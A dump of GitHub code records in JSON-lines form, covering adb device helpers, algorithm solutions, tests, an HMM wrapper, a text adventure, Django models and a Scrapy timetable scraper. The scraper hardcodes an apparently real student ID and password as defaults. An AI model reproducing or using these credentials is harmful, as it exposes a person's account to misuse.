subprocess.check_output(\n            \"adb shell input keyevent 26\",\n            shell=True\n        )\n\ndef unlock(pincode):\n    \"\"\"Unlock device with the given PIN.\"\"\"\n    wakeup()\n    comand = (\n        \"adb shell input keyevent 82\"\n        \" && adb shell input text {}\"\n        \" && adb shell input keyevent 66\"\n    ).format(pincode)\n    subprocess.check_output(\n        comand,\n        shell=True\n    )\n\ndef install_apk(apk):\n    \"\"\"Install apk.\n    Accepts downgrade, grants all requested permissions,\n    and reinstalls if app already exists.\n    \"\"\"\n    subprocess.check_output([\"adb\", \"install\", \"-d\", \"-g\", \"-r\", apk])\n\ndef check_adb():\n    \"\"\"Check whether adb is available.\"\"\"\n    return which(\"adb\") is not None\n\ndef is_android_device_available():\n    \"\"\"Check whether at least one Android device is available.\"\"\"\n    if not check_adb():\n        return False\n    result = subprocess.check_output(\n        \"adb devices\",\n        shell=True,\n        universal_newlines=True\n    )\n    devices = result.partition('\\n')[2].replace('\\n', '').split('\\tdevice')\n    devices = [device for device in devices if len(device) > 2]\n    if not devices:\n        return False\n    try:\n        result = subprocess.check_output(\n            \"adb shell getprop sys.boot_completed\",\n            shell=True,\n            universal_newlines=True).strip()\n        return result == \"1\"\n    except subprocess.CalledProcessError:\n        return False\n\ndef get_device_model(serialno=None):\n    \"\"\"Get the currently connected device model.\"\"\"\n    if serialno:\n        command = (\"adb shell -s {} \"\n                   \"getprop ro.product.model\").format(serialno)\n    else:\n        command = \"adb shell getprop ro.product.model\"\n    try:\n        return subprocess.check_output(\n            command,\n            shell=True,\n            universal_newlines=True\n        ).strip()\n    except subprocess.CalledProcessError:\n        return \"N/A\"\n\ndef connect_adb_through_wifi():\n    \"\"\"Configure `adb` through a wifi connection.\"\"\"\n    net_output = subprocess.check_output(\n        \"adb shell ip -f inet addr show wlan0\",\n        shell=True,\n        universal_newlines=True\n    )\n    ip_address = re.search(r\"inet \\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\", net_output).group()[5:]\n    subprocess.check_output(\n        \"adb tcpip 5555\",\n        shell=True\n    )\n    subprocess.check_output(\n        \"adb connect {}\".format(ip_address),\n        shell=True\n    )\n\ndef reconnect_adb_through_usb():\n    \"\"\"Connect adb back to USB while in wifi.\"\"\"\n    try:\n        subprocess.check_output(\n            \"adb reconnect\",\n            shell=True\n        )\n    except subprocess.CalledProcessError:\n        pass\n\ndef get_package_from_apk(apk_path):\n    aapt = \"$ANDROID_HOME/build-tools/27.0.0/aapt\"\n    result = subprocess.check_output(\n        aapt + \" dump badging {} | awk '/package/{{gsub(\\\"name=|'\\\"'\\\"'\\\",\\\"\\\"); print $2}}'\".format(apk_path),\n        shell=True\n    )\n    return str(result.strip(), 'utf-8')\n\ndef get_instrumentation_for_app(app_pkg, test_pkg=\"\"):\n    pattern = re.compile(\"instrumentation:(.*) \")\n    output = subprocess.check_output(\n        \"adb shell pm list instrumentation | grep -i {}\".format(app_pkg),\n        shell=True\n    )\n    if type(output) is bytes:\n        output = output.decode('utf-8')\n    search = pattern.search(output)\n    if search:\n        return search.group(1)\n    \n","repo_name":"TQRG/physalia","sub_path":"physalia/utils/android.py","file_name":"android.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"}
+{"seq_id":"12818897787","text":"# Brute-force solution\n# class Solution:\n#     def intersection(self, nums1, nums2):\n#         ans = set()\n#\n#         for num in nums1:\n#             if num in nums2:\n#                 ans.add(num)\n#\n#         return list(ans)\n\n# Binary search\n# class Solution:\n#     def intersection(self, nums1, nums2):\n#         def is_in(num):\n#             s, e = 0, len(nums2)-1\n#             while s <= e:\n#                 m = (s+e)//2\n#                 if nums2[m] == num:\n#                     return True\n#                 elif nums2[m] > num:\n#                     e = m-1\n#                 else:\n#                     s = m+1\n#\n#             return False\n#\n#         nums2.sort()\n#\n#         ans = set()\n#         for num in nums1:\n#             if is_in(num):\n#                 ans.add(num)\n#\n#         return ans\n\n# Using the bisect module\n# import bisect\n#\n# class Solution:\n#     def intersection(self, nums1, nums2):\n#         result = set()\n# 
nums2.sort()\n#\n#         for n1 in nums1:\n#             i2 = bisect.bisect_left(nums2, n1)\n#             if len(nums2) > 0 and len(nums2) > i2 and n1 == nums2[i2]:\n#                 result.add(n1)\n#\n#         return result\n\n\nclass Solution:\n    def intersection(self, nums1, nums2):\n        nums1.sort()\n        nums2.sort()\n\n        L, R = 0, 0\n\n        ans = set()\n        while L < len(nums1) and R < len(nums2):\n            if nums1[L] == nums2[R]:\n                ans.add(nums1[L])\n                L, R = L+1, R+1\n            else:\n                if nums1[L] < nums2[R]:\n                    while L < len(nums1) and nums1[L] < nums2[R]:\n                        L += 1\n                else:\n                    while R < len(nums2) and nums2[R] < nums1[L]:\n                        R += 1\n        return ans\n\n\ns = Solution()\nnums1 = [1,2,2,1]\nnums2 = [2,2]\n# nums1 = [4,9,5]\n# nums2 = [9,4,9,8,4]\nprint(s.intersection(nums1, nums2))","repo_name":"galid1/Algorithm","sub_path":"python/leetcode/binary_search/349.Intercetion of Two Arrays.py","file_name":"349.Intercetion of Two Arrays.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
+{"seq_id":"27362038375","text":"#\n#\n# Count letters and check whether the two strings can match\n# 1 lengths must be equal 2 no contradictions in letter counts\n#\n#\n\n\ndef my_print(x):\n    # print(x)\n    pass\n\n\ndef my_func_test():\n    assert my_run(\"abba\", \"baaa\") == 'N'\n    assert my_run(\"cccrocks\", \"socc*rk*\") == 'A'\n\n\ndef my_run(my_str1, my_str2):\n    dic1 = {}\n    dic2 = {'*': 0}\n\n    for x in my_str1:\n        dic1.setdefault(x, 0)\n        dic1[x] = dic1[x] + 1\n\n    for x in my_str2:\n        dic2.setdefault(x, 0)\n        dic2[x] = dic2[x] + 1\n\n    my_print(dic1)\n    my_print(dic2)\n    for k, v in dic1.items():\n        dic2.setdefault(k, 0)\n        dic2[k] = dic2[k] - dic1[k]\n    my_print(dic2)\n    # check whether the remaining differences can be covered by the number of '*'\n    total = 0\n\n    for k, v in dic2.items():\n        if k == '*':\n            pass\n        else:\n            if dic2['*'] >= abs(v):\n                dic2[k] = 0\n                dic2['*'] = dic2['*'] - abs(v)\n    # remove items where v == 0\n    my_print(\"after merge dic2={0}\".format(dic2))\n    a_list = [k for k in dic2.items() if k[1] != 0]\n    my_print(\"a_list={0}\".format(a_list))\n    if len(a_list) == 0:\n        return 'A'\n    else:\n        return 'N'\n\n\nmy_func_test()\n\n\ndef my_main():\n    str1 = input()\n    str2 = input()\n    res = my_run(str1, str2)\n    print(res)\n\n\nmy_main()\n","repo_name":"hzwuhao8/ccc","sub_path":"2016/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"3391112045","text":"import logging\nimport unittest\n\nfrom modelforge.logs import setup_logging\nfrom modelforge.tests.capture import captured_output\n\n\nclass LogTests(unittest.TestCase):\n    def test_setup(self):\n        with captured_output() as (out, err, log):\n            root = logging.getLogger()\n            if len(root.handlers) == 1:\n                root.handlers.insert(0, logging.StreamHandler())\n            setup_logging(\"INFO\")\n            logger = logging.getLogger(\"test\")\n            logger.info(\"success\")\n        self.assertIn(\"test\", err.getvalue())\n        self.assertIn(\"success\", err.getvalue())\n        self.assertIn(\"1;36\", err.getvalue())\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"adolfoeliazat/modelforge","sub_path":"modelforge/tests/test_logs.py","file_name":"test_logs.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"}
+{"seq_id":"72733604006","text":"#!/usr/bin/env python3\nimport sys\nimport gzip\n\ninput_file = sys.argv[1]\ninput_handle = gzip.open(input_file)\noutput_handle = sys.stdout\n\ncount_dict = {}\nwhile True:\n    lines = []\n    for i in range(4):\n        lines.append(input_handle.readline().decode())\n    try:\n        bc = lines[0].split('\\t')[3]\n    except IndexError:\n        
break\n try:\n count_dict[bc] += 1\n except KeyError:\n count_dict[bc] = 1\n if count_dict[bc] <= 100000:\n [output_handle.write(l) for l in (lines)]","repo_name":"thomasvangurp/epiGBS","sub_path":"de_novo_reference_creation/subsample.py","file_name":"subsample.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"33996681190","text":"\"\"\"Hidden Markov Model based annotation from hmmlearn.\n\nThis code provides a base interface template for models\nfrom hmmlearn for using that library for annotation of time series.\n\nPlease see the original library\n(https://github.com/hmmlearn/hmmlearn/blob/main/lib/hmmlearn/hmm.py)\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.annotation.base import BaseSeriesAnnotator\n\n__author__ = [\"miraep8\"]\n__all__ = [\"BaseHMMLearn\"]\n\n\nclass BaseHMMLearn(BaseSeriesAnnotator):\n \"\"\"Base class for all HMM wrappers, handles required overlap between packages.\"\"\"\n\n _tags = {\n \"univariate-only\": True,\n \"fit_is_empty\": True,\n \"python_dependencies\": \"hmmlearn\",\n } # for unit test cases\n _hmm_estimator = None\n\n def __init__(self):\n super().__init__()\n\n @staticmethod\n def _fix_input(X):\n \"\"\"Convert input X into the format needed.\n\n Parameters\n ----------\n X : arraylike (1D np.ndarray or pd.series), shape = [num_observations]\n Observations to apply labels to.\n\n Returns\n -------\n X : arraylike (2D np.ndarray), shape = [1, num_observations]\n Observations to apply labels to.\n series: bool - whether or not X was originally a pd.Series\n index: pd.index, the index if X was originally a series object.\n \"\"\"\n series = isinstance(X, pd.Series)\n index = None\n if series:\n index = X.index\n X = (X.to_numpy()).reshape((-1, 1))\n if isinstance(X, np.ndarray) and X.ndim == 1:\n X = X.reshape((-1, 1))\n return X, series, index\n\n def _fit(self, X, Y=None):\n \"\"\"Ensure X is correct type, then fit wrapped estimator.\n\n Parameters\n ----------\n X : arraylike (1D np.ndarray or pd.series), shape = [num_observations]\n Observations to apply labels to.\n\n Returns\n -------\n self :\n Reference to self.\n \"\"\"\n X, _, _ = self._fix_input(X)\n self._hmm_estimator = self._hmm_estimator.fit(X)\n return self\n\n def _predict(self, X):\n \"\"\"Ensure the input type is correct, then predict using wrapped estimator.\n\n Parameters\n ----------\n X : 1D np.array, shape = [num_observations]\n Observations to apply labels to.\n\n Returns\n -------\n annotated_x : array-like, shape = [num_observations]\n Array of predicted class labels, same size as input.\n \"\"\"\n X, series, index = self._fix_input(X)\n X_prime = self._hmm_estimator.predict(X)\n if series:\n X_prime = pd.Series(X_prime, index=index)\n return X_prime\n\n def sample(self, n_samples=1, random_state=None, currstate=None):\n \"\"\"Interface class which allows users to sample from their HMM.\"\"\"\n return self._hmm_estimator.sample(n_samples, random_state, currstate)\n","repo_name":"sktime/sktime","sub_path":"sktime/annotation/hmm_learn/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"21926699790","text":"def main():\n user_name = input('\\nHello, and welcome to the game. 
Prepare for an adventure!\\nLoading game...\\nPlease enter your name:\\n')\n user_name = user_name[1:] + user_name[0] + 'ay'\n print(\"\\nHello \" + user_name + \"!\")\n start_scene()\n return\n\ndef start_scene():\n print(\"You are a student at UC Berkeley, and you have just been assigned a new CS project.\")\n choices = [\"Start now.\", \"Start later.\"]\n choice = user_decide(choices)\n if choice == 0:\n squirrel()\n if choice == 1:\n party()\n\ndef squirrel():\n print(\"Great! You are on your way to Soda when sUdDenly a wild squiRrel appears!!!\")\n choices = ['Feed squirrel', 'Kick squirrel.']\n choice = user_decide(choices)\n if choice == 0:\n feed_squirrel()\n if choice == 1:\n kick_squirrel() \n \ndef party():\n print(\"Instead of working you decide to go to a party!!\")\n choices = [\"It's a study party for a class more important than CS...\", 'Turnt up!!']\n choice = user_decide(choices)\n if choice == 0:\n study_party()\n if choice == 1:\n turn_up()\n\ndef feed_squirrel():\n print(\"That squirrel bites you!!\")\n choices = [\"Bite it back!\", \"Head over to the Tang Center because you forgot to waive SHIP and your health is your number one priority.\"]\n choice = user_decide(choices)\n if choice == 0:\n bite_back()\n if choice == 1:\n tang()\n\ndef kick_squirrel():\n print(\"The squirrel thinks you're rood.\")\n choices = ['Continue to Soda.', 'All this squirrel kicking makes you tired. You head home for a nap.']\n choice = user_decide(choices)\n if choice == 0:\n go_to_soda()\n nap()\n\ndef study_party():\n print(\"What?? A class more important than CS?? HAHAHA\")\n choices = ['Yeah man I was jk!', \"I'm delirious and I choose to stay at the study party.\"]\n choice = user_decide(choices)\n if choice == 0:\n jk()\n if choice == 1:\n stay()\n\ndef turn_up():\n print(\"Turn up for WHATT?\")\n print(\"Not your grades!! You failed this class.\")\n user_death()\n\ndef bite_back():\n print(\"Yumm... squirrel!\")\n print(\"You die of salmonella.\")\n user_death()\n\ndef tang():\n print(\"You decide that while you're here, you're going to try to appeal your waiver. You are denied again!\")\n choices = ['Flip a table.', 'Calmly accept your fate.']\n choice = user_decide(choices)\n if choice == 0:\n table()\n if choice == 1:\n fate()\n\ndef jk():\n print(\"You think this is a joke?!\")\n print(\"Ded.\")\n user_death()\n\ndef stay():\n print(\"You fail CS because you're too busy study partying.\")\n print(\"Ded.\")\n user_death()\n\ndef table():\n print(\"You are kicked out of Tang and die of infection.\")\n print(\"Ded.\")\n user_death()\n\ndef fate():\n print(\"The table flips over anyway. You are kicked out of Tang for disturbing the peace.\")\n print(\"You leave in pieces.\")\n user_death()\n\ndef go_to_soda():\n print(\"You thought it was due at midnight today. But it was really due midnight yesterday.\")\n print(\"Cry.\")\n print(\"Cry more.\")\n user_death()\n\ndef nap():\n print(\"You oversleep and miss the deadline!\")\n print(\"Cry.\")\n print(\"Creys.\")\n user_death() \n\ndef user_death():\n print(\"You have died and failed. Goodbye.\")\n return\n\ndef user_decide(choices):\n list_choices(choices)\n choice = -1\n while ((choice != 0) and (choice != 1)):\n choice = input(\"\\nWhat do you decide to do? Enter the number of your decision:\\n\")\n choice = int(choice) - 1\n return choice\n\ndef list_choices(choices):\n print(\"1) \" + choices[0])\n print(\"2) \" + choices[1])\n\ndef user_success():\n print(\"You have beat the game! Congratulations! 
Enjoy the rest of your day.\")\n\nmain()\n","repo_name":"jshoe/introhack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"29661428948","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport pygame\nfrom pygame.sprite import Sprite\n\n\nclass Bullet(Sprite):\n    \"\"\"A class to manage bullets fired from the ship\"\"\"\n\n    def __init__(self, ai_settings, screen, ship):\n        \"\"\"Create a bullet at the ship's position\"\"\"\n        super(Bullet, self).__init__()\n        self.screen = screen\n\n        # Create the bullet rect at (0, 0), then set its correct position\n        self.rect = pygame.Rect(0, 0, ai_settings.bullet_width, ai_settings.bullet_height)\n        self.rect.centerx = ship.rect.centerx\n        self.rect.top = ship.rect.top\n\n        # Store the bullet's position as a float\n        self.y = float(self.rect.y)\n\n        self.color = ai_settings.bullet_color\n        self.speed_factor = ai_settings.bullet_speed_factor\n\n    def update(self):\n        \"\"\"Move the bullet up the screen\"\"\"\n        # Update the float value of the bullet's position\n        self.y -= self.speed_factor\n        # Update the bullet's rect position\n        self.rect.y = self.y\n\n    def draw_bullet(self):\n        \"\"\"Draw the bullet to the screen\"\"\"\n        pygame.draw.rect(self.screen, self.color, self.rect)","repo_name":"wjainiya/Alien_game1","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"16604101701","text":"from math import fsum\nfrom typing import Callable,List,Set\nfrom functools import wraps\nfrom time import perf_counter\ndef stop_watch(func:Callable) ->Callable:\n    times=[]\n    @wraps(func)\n    def inner(*args,**kwargs):\n        for _ in range(10):\n            start_time = perf_counter()\n            func(*args,**kwargs)\n            end_time = perf_counter()\n            elapsed = end_time - start_time\n            times.append(elapsed)\n        average_time = fsum(times) / len(times)\n        print(f\"Average elapsed time for executing {func.__name__} is {average_time:.5f}\")\n    return inner\n@stop_watch\ndef make_list(size:int) -> List:\n    return list(range(size))\n\n@stop_watch\ndef make_set(size:int) -> Set:\n    return set(range(size))\n\nmake_list(100_000)\nmake_set(100_000)\n'''\ndef example_decorator(func: Callable) -> Callable:\n    @wraps(func)\n    def inner(*args, **kwargs):\n        start_time = perf_counter()\n        func(*args, **kwargs)\n        end_time = perf_counter()\n        print(f\"For {func.__name__} code execution time was around {end_time - start_time:.5f} seconds\")\n    return inner\n@example_decorator\ndef add(*args, **kwargs):\n    print(sum(*args, **kwargs))\n\n@example_decorator\ndef add(*args, **kwargs):\n    print(sum(*args, **kwargs))\n\nadd([1, 5, 7, 4, 8])\nadd([200, 345])\nprint(add) # with wraps the name gets preserved\n\n# can find sum of any number of values using decorators\n# print(add) without wraps gives <function example_decorator.<locals>.inner at 0x03130780>\nprint(\"And the sum is:\", func(*args,**kwargs))\ndef add(*args,**kwargs):return sum(*args,**kwargs) \ncan be used to print the sum but we can directly use the value obtained from inner using return inside it\n\ndef example_decorator(func: Callable) -> Callable:\n    def inner(): #without arguments\n        pass\n    return inner\n@example_decorator\ndef greeting():\n    pass\ngreeting()\n# print(example_decorator(greeting)) gives <function example_decorator.<locals>.inner at 0x03130780>\n# print(greet) gives the reference obj of this func instead just call greet()\n# which takes up greeting fn and pass it to our decorator\n# greet = example_decorator(greeting) greet() This approach becomes clumsy to use \nso, we can use @decorator_name on the func which we want to call inside our decorator 
func\n'''","repo_name":"Anushaanil/Book_Maintainance","sub_path":"Decorator_ex.py","file_name":"Decorator_ex.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18268614515","text":"from collections import deque\n\nfrom aoc.utils import load_data, profiler\n\n\n@profiler\ndef part1(data):\n count = 0\n current = data[0]\n for depth in data:\n count += depth > current\n current = depth\n return count\n\n\n@profiler\ndef part2_slice(data):\n count = 0\n last_sum = sum(data[0:3])\n for i in range(1, len(data) - 2):\n current_sum = sum(data[i : i + 3])\n count += current_sum > last_sum\n last_sum = current_sum\n return count\n\n\n@profiler\ndef part2(data: deque[int]):\n count = 0\n window = deque([data.popleft() for _ in range(3)])\n last_sum = sum(window)\n while data:\n window.append(data.popleft())\n window.popleft()\n current_sum = sum(window)\n count += current_sum > last_sum\n last_sum = current_sum\n return count\n\n\ndef main() -> None:\n data = list(map(int, load_data(test=False)))\n print(part1(deque(data)), part2_slice(data), part2(deque(data)), sep=\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RaeedAhmed/advent-of-code","sub_path":"src/2021/01/sonar_sweep.py","file_name":"sonar_sweep.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5079748869","text":"import uuid\nfrom typing import Optional\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom pastas import forms, models\n\nUser = get_user_model()\n\n\nclass PastaFormTestCase(TestCase):\n def test_new_public_pasta_generates_public_id(self):\n form = self._create_and_validate_pasta_form(public=True)\n\n pasta = form.save()\n\n self.assertTrue(pasta.public)\n self.assertIsNotNone(pasta.public_id)\n\n def test_new_private_pasta_created_without_public_id(self):\n form = self._create_and_validate_pasta_form(public=False)\n\n pasta = form.save()\n\n self.assertFalse(pasta.public)\n self.assertIsNone(pasta.public_id)\n\n def test_making_pasta_private_deletes_public_id(self):\n pasta = _create_pasta(public_id=uuid.uuid4())\n form = self._create_and_validate_pasta_form(public=False, instance=pasta)\n\n pasta = form.save()\n\n self.assertFalse(pasta.public)\n self.assertIsNone(pasta.public_id)\n\n def test_making_pasta_public_creates_public_id(self):\n pasta = _create_pasta()\n form = self._create_and_validate_pasta_form(public=True, instance=pasta)\n\n pasta = form.save()\n\n self.assertTrue(pasta.public)\n self.assertIsNotNone(pasta.public_id)\n\n def test_user_that_created_pasta_is_saved(self):\n user = User.objects.create_user('Username')\n form = self._create_and_validate_pasta_form(user=user)\n\n pasta = form.save()\n\n self.assertEqual(pasta.created_by, user)\n\n @staticmethod\n def _create_and_validate_pasta_form(public=False, instance: Optional[models.Pasta] = None,\n user: Optional[User] = None) -> forms.PastaForm:\n form = forms.PastaForm({'name': 'Name', 'text': 'Text.', 'public': public}, instance=instance, user=user)\n form.is_valid()\n return form\n\n\nclass PastaPublicFormTestCase(TestCase):\n def test_creating_pasta_generates_public_id(self):\n form = self._create_and_validate_pasta_form()\n\n pasta = form.save()\n\n self.assertTrue(pasta.public)\n\n @staticmethod\n def _create_and_validate_pasta_form():\n form = forms.PastaPublicForm({'name': 'Name', 
'text': 'Text.'})\n        form.is_valid()\n        return form\n\n\ndef _create_pasta(public_id=None) -> models.Pasta:\n    pasta = models.Pasta.objects.create(name='Name', text='Text.', public_id=public_id)\n    return pasta\n","repo_name":"mlkra/pastas","sub_path":"pastas/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"32991509070","text":"from django.db import models\nfrom employees.models import Employee\n# Create your models here.\n\nclass Type(models.Model):\n    type = models.CharField('type', max_length=80, unique=True)\n    class Meta:\n        # set the model's name shown in the admin panel\n        verbose_name = \"Type\"\n        verbose_name_plural = \"Types\"\n        ordering = [\"type\"]\n\n    def __str__(self):\n        return self.type\n\n\nclass Location(models.Model):\n    location = models.CharField('location', max_length=80, unique=True)\n    class Meta:\n        # set the model's name shown in the admin panel\n        verbose_name = \"Location\"\n        verbose_name_plural = \"Locations\"\n        ordering = [\"location\"]\n\n    def __str__(self):\n        return self.location\n\n\nclass Item(models.Model):\n    item = models.CharField('item', max_length=255)\n    number = models.CharField('number', max_length=80)\n    hw = models.CharField('HW', max_length=255, blank=True, null=True)\n    type = models.ForeignKey(Type, default='', on_delete=models.SET_DEFAULT, null=True )\n    owner = models.ForeignKey(Employee, default='', on_delete=models.SET_DEFAULT, null=True )\n    location = models.ForeignKey(Location, default='', on_delete=models.SET_DEFAULT, null=True )\n    description = models.TextField(blank=True, null=True)","repo_name":"domestos/Django_rest_api","sub_path":"app/inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"36015222305","text":"import scrapy\nfrom datetime import datetime\nfrom scrapy.http import FormRequest, Request\nfrom scrapy.utils.response import open_in_browser\nfrom time import strptime\nfrom json import dump\n\nclass Scraper(scrapy.Spider):\n\n    name = 'time'\n    start_urls = ['https://timetable.ul.ie/Login.aspx?ReturnUrl=%2fStudentTimetable.aspx']\n    timetable = {}\n\n    def __init__(self, student_id='18238831', pwd='Monday123'): # Input your ID number and password here to see original implementation\n        self.timetable['class'] = []\n        self.timetable['misc'] = {\n            'id': '',\n            'email': '',\n            'pwd': '',\n            'year': 0,\n            'date_time': datetime.now().strftime('%d-%m-%y %H:%M')\n        }\n        self.timetable['misc']['id'] = student_id\n        self.timetable['misc']['email'] = student_id+'@studentmail.ul.ie'\n        self.timetable['misc']['pwd'] = pwd\n        self.classes = []\n\n\n    def parse(self, response):\n        token = response.css('#__EVENTVALIDATION::attr(value)').extract_first()\n        return FormRequest.from_response(response, formdata={\"__EVENTVALIDATION\": token, \"TextBox_UserName\":self.timetable['misc']['id'], \"TextBox_Password\":self.timetable['misc']['pwd']}, callback=self.LoggedIn)\n\n    def LoggedIn(self, response):\n        self.timetable['misc']['pwd'] = ''\n        student_timetable_link = response.xpath('//*[@id=\"MainContent_StudentTile\"]/a/@href').get()\n        return response.follow(student_timetable_link, callback=self.GetTimetable)\n\n    def GetTimetable(self, response):\n        table = response.css('#MainContent_StudentTimetableGridView')\n        days = [0, 1, 2, 3, 4, 5]\n        rows = response.css('html body form#ctl01 div.container.body-content 
div.Grid div table#MainContent_StudentTimetableGridView.cssgridview.table-responsive tbody tr') # ~~~~~~~~~ Point the bot the table grid \n print(rows)\n for row in rows[1:]:\n cells = row.xpath('td') #~~~~~ Use the table selector object to shortent the css path / xpath\n print(cells)\n day = 0\n for cell in cells:\n data = cell.xpath('text()').getall()\n print(data)\n # ['09:00 - 11:00', 'EE4216 - LAB - 2B', ' HAYES (ECE) MARTIN DR', 'Wks:4,8,13']\n for c in data:\n if(c == ' '):\n data.remove(c)\n elif(c==r'\\xa0'):\n break\n #\n if(data == []):\n continue\n #\n print(\"data: \", data)\n start_index = 0\n for d in data:\n start_index += 1\n if(TimeCheck(d)):\n subdata = [d]\n for elem in data[start_index:]:\n print('elem: ', elem)\n if(TimeCheck(elem)):\n break\n else:\n subdata.append(elem)\n \n print(\"subdata: \", subdata)\n new_class = ProcessClassData(subdata, days[day])\n print('processed: ', new_class)\n self.classes.append(new_class)\n \n day+=1\n\n return self.classes\n\n def closed(self, response):\n filename = r'output.json'\n with open(filename, 'w+') as db:\n dump(self.classes, db)\n pass\n\ndef TimeCheck(input):\n try:\n times = input.split('-')\n start_time = times[0].strip()\n end_time = times[1].strip()\n strptime(start_time, '%H:%M')\n strptime(end_time, '%H:%M')\n return True\n except ValueError:\n return False\n except IndexError:\n return False\n\ndef ProcessClassData(class_data, day):\n new_class = {\n 'day': day,\n 'professor': 'Null',\n 'module': 'Null',\n 'group': 'Null',\n 'delivery': 'Null',\n 'location': 'Null',\n 'active_weeks': [],\n 'start_time': '00:00',\n 'end_time': '00:00'\n }\n #\n times = class_data[0].split('-')\n start_time = times[0].strip()\n end_time = times[1].strip()\n #\n class_desc = class_data[1].split('-')\n module = class_desc[0].strip()\n delivery = class_desc[1].strip()\n #\n try:\n group = class_desc[2].strip()\n new_class['group'] = group\n except IndexError as e:\n pass\n #\n try:\n professor = 'Unknown'\n location = ''\n if(len(class_data) < 5):\n # data missing\n unknown_data = class_data[-2].strip()\n location = unknown_data\n professor = unknown_data\n else:\n location = class_data[-2].strip()\n professor = class_data[2].strip()\n new_class['professor'] = professor\n new_class['location'] = location\n except IndexError as e:\n pass\n #\n active_weeks = class_data[-1].replace('Wks:', '').strip()\n active_weeks = active_weeks.split(',')\n #\n new_class['day'] = day\n new_class['start_time'] = start_time\n new_class['end_time'] = end_time\n new_class['module'] = module\n new_class['delivery'] = delivery\n new_class['active_weeks'] = active_weeks\n # \n return new_class","repo_name":"xemmett/ppe","sub_path":"material/demonstration/original_scraper/original_scraper/spiders/old_spider.py","file_name":"old_spider.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21431572828","text":"from os import path\nfrom pathlib import Path\nfrom psychopy.experiment.components import BaseComponent, Param, _translate\nfrom psychopy.localization import _localized as __localized\nimport serial.tools.list_ports\n_localized = __localized.copy()\n\n_localized.update({'pulseDuration': _translate('Pulse duration (s)'),\n 'numberOfPulses': _translate('Number of pulses'),\n 'numberOfSequences': _translate('Number of sequences'),\n 'delayBetweenSeq': _translate('Delay between sequences (s)'),\n 'delayBetweenPulses': _translate('Delay between pulses (s)'),\n 
'saveStats': _translate('Save actions of pump and licks to txt file'),\n 'stopVal': _translate('Duration (s)'),\n 'com_port': _translate('COM port'),})\n\n\nclass PeristalticPumpComponent(BaseComponent):\n \"\"\"Delivers a water reward to the animal and monitor licks\"\"\"\n targets = ['PsychoPy']\n categories = ['I/O']\n iconFile = Path(__file__).parent / 'reward.png'\n tooltip = _translate(\n 'LabeoTech Pump: Delivers a water reward to the animal and monitor '\n 'water consumption (licks)')\n\n def __init__(self, exp, parentName, name='reward',\n pulseDuration=0, numberOfPulses = 0, delayBetweenSeq = 0,\n numberOfSequences = 0, delayBetweenPulses = 0,\n startType='time (s)', startVal='0.0', stopVal='1.0',\n stopType='duration (s)', saveStats = False,\n com_port=\"Select pump com port\"):\n\n super(PeristalticPumpComponent, self).__init__(\n exp, parentName, name, startType=startType, startVal=startVal,\n stopType=stopType, stopVal=stopVal\n )\n\n self.type = 'PeristalticPump'\n self.url = 'file:///C:/Users/delam/Desktop/BehavioralTask/pompe_sequence.html'\n # TODO : create a html help page with pump sequence on the options panel\n #self.url = Path(__file__).parent / 'pompe_sequence.html'\n\n # Order in which the user-settable parameters will be displayed\n # in the component's properties window.\n #self.order += ['PulseDuration', # Basic tab]\n\n self.params['pulseDuration'] = Param(\n pulseDuration, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('The duration of the pulse sent to the peristaltic pump'),\n label=_localized['pulseDuration'])\n\n self.params['numberOfPulses'] = Param(\n numberOfPulses, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Number of pulses in a burst sequence'),\n label=_localized['numberOfPulses'])\n\n self.params['delayBetweenSeq'] = Param(\n delayBetweenSeq, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Delay between sequences'),\n label=_localized['delayBetweenSeq'])\n\n self.params['numberOfSequences'] = Param(\n numberOfSequences, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Number of sequence in a single reward event'),\n label=_localized['numberOfSequences'])\n\n self.params['delayBetweenPulses'] = Param(\n delayBetweenPulses, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Delay between pulses in a burst sequence'),\n label=_localized['delayBetweenPulses'])\n\n 